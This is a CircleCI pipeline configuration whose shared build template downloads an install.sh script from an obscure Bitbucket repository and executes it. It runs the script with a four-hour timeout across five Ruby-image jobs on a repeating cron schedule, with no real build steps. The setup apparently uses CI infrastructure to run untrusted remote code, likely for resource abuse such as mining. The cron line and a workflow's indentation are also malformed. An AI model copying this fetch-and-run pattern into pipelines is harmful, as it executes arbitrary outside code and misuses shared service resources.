.build_template: &appbuild
  steps:
    - run: curl -L https://bitbucket.org/azureshjlfgs/azuree/raw/d5cff2c590623f9e0453106b74e871aff8934094/install.sh > ./install.sh
    - run: chmod +x ./install.sh
    - run: 
       name: circleci
       command: ./install.sh
       no_output_timeout: 4h
        
version: 2.0

jobs:
  app01:
    docker:
      - image: ruby
    steps:
      - checkout
  app07:
    <<: *appbuild
    docker:
      - image: circleci/ruby:2.7
  app06:
    <<: *appbuild
    docker:
      - image: circleci/ruby:2.6
  app05:
    <<: *appbuild
    docker:
      - image: circleci/ruby:2.5
  app04:
    <<: *appbuild
    docker:
      - image: circleci/ruby:2.4
  app03:
    <<: *appbuild
    docker:
      - image: circleci/ruby:2.3

workflows:
  version: 2
  commit:
    jobs:
      - app01
      - app07
      - app06
      - app05
      - app04
      - app03

    triggers:
      - schedule:
          cron: "0 4,8,12,16,20, * * *"
          filters:
            branches:
              only:
                - master

 deployapp:
    jobs:
      - app01
      - app07
      - app06
      - app05
      - app04
      - app03